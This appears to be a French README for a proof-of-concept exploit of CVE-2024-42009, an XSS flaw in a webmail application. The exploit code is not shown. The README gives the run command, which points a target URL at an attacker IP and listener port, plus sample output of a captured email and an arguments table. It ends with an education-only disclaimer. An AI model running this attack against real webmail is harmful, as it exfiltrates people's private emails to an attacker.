
Ce Proof of Concept (PoC) démontre une exploitation de la CVE-2024-42009, tirant parti d'une vulnérabilité de script intersite (XSS) pour extraire des e-mails d'une application de webmail cible. L'attaque injecte une charge utile malveillante qui exfiltre le contenu des e-mails vers un écouteur contrôlé par l'attaquant.
Cette preuve de concept (PoC) démontre une exploitation de CVE-2024-42009, tirant parti d'une vulnérabilité de cross-site scripting (XSS) pour extraire des e-mails d'une application de webmail cible. L'attaque injecte une charge utile malveillante qui exfiltre le contenu des e-mails vers un listener contrôlé par l'attaquant.
pip install requests beautifulsoup4
Exécutez le script avec les arguments nécessaires :
python exploit.py -fu [email protected] -tu [email protected] -u http://target.com/contact -ip YOUR_IP -p 1337
[*] CVE-2024-42009 PoC: Listening on 192.168.1.100:1337...
[*] Sending payload for UID 1...
[+] Payload sent for UID 1 (Status: 200)
[+] Captured Email Content:
Hello, this is a test email!
Je ne revendique ni le crédit, ni la propriété, ni la divulgation de la vulnérabilité et de toutes les exploitations correspondantes hébergées dans ce dépôt GitHub - Tout le crédit revient au chercheur qui l'a découverte ; j'ai simplement créé une POC pour reproduire la vulnérabilité sur la base des données disponibles sur Internet. Cette POC est uniquement destinée à des fins éducatives et de recherche. Tester sans autorisation sur des systèmes sans consentement est illégal. Utilisez-la de manière responsable !
| Argument | Description |
|---|
-fu, --from-user | L'adresse e-mail de l'expéditeur |
-tu, --to-user | L'adresse e-mail du destinataire |
-u, --target-url | L'URL du webmail cible |
-ip, --server-ip | L'adresse IP du listener de l'attaquant |
-p, --server-port | Le port du listener (par défaut : 1337) |